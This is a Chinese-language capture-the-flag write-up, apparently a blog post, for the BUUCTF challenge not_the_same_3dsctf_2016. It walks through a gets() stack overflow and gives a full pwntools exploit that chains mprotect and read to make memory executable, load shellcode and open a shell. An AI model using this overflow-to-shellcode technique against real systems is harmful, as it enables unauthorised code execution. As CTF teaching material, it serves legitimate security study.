BUUCTF not_the_same_3dsctf_2016

本题目本地与远程得用两种方案打。

1.Checksec & IDA Pro

部分RELRO与栈不可执行。

在IDA中发现了 get_secret 函数

int get_secret()
{
  int v0; // esi

  v0 = fopen("flag.txt", &unk_80CF91B);
  fgets(&fl4g, 45, v0);
  return fclose(v0);
}

 main函数

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[45]; // [esp+Fh] [ebp-2Dh] BYREF

  printf((int)"b0r4 v3r s3 7u 4h o b1ch4o m3m0... ");
  gets(v4); //栈溢出漏洞
  return 0;
}

显而易见的栈溢出漏洞,会让人有惯性思维进行ret2text。但是事实并非如此。

如果使用 get_secret 函数打通了本地,会发现远程是打不通的。

再看一眼函数列表

mprotect 函数

原型:int mprotect(void *addr, size_t len, int prot)

addr 内存起始值

len 内存空间大小 

prot 内存权限

因此远程打通的思路是:

溢出 --> 给一段内存使用 mprotect 修改为可执行 --> shellcode

实际Payload:

mproctet_addr = elf.sym['mprotect']
read_addr = elf.sym['read']
pop = 0x804F420
	
mem_addr = 0x80EB000 # IDA Ctrl + S 查看 .got.plt 段起始地址并填入
mem_size = 0x1000    # 只要放得下 shellcode 就够用,设置大小无所谓
mem_type = 0x7       # 7 可执行权限

shellcode = asm(shellcraft.sh())
	
payload = ( b'A' * 0x2D ) + p32(mproctet_addr) + p32(pop) + p32(mem_addr) + p32(mem_size) + p32(mem_type)
payload += p32(read_addr) + p32(pop) + p32(0) + p32(mem_addr) + p32(len(shellcode)) + p32(mem_addr)

#溢出 --> 执行 mprotect 函数,使 .got.plt 段可执行 ,由于有3个参数,需要3个pop
#用 read 函数,写入 shellcode 到段中目标地址

完整PoC:

from pwn import *

elf = ELF("/root/Desktop/PwnSubjects/not_the_same_3dsctf_2016")
#io = remote("node4.buuoj.cn",29455)
io = process("/root/Desktop/PwnSubjects/not_the_same_3dsctf_2016")
	
mprotect_addr = elf.sym['mprotect']
read_addr = elf.sym['read']
pop = 0x804F420
	
mem_addr = 0x80EB000
mem_size = 0x1000
mem_type = 0x7

shellcode = asm(shellcraft.sh())
	
payload = ( b'A' * 0x2D ) + p32(mprotect_addr) + p32(pop) + p32(mem_addr) + p32(mem_size) + p32(mem_type)
payload += p32(read_addr) + p32(pop) + p32(0) + p32(mem_addr) + p32(len(shellcode)) + p32(mem_addr)

io.sendline(payload)
io.sendline(shellcode)
io.interactive()
	

成功获取shell

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值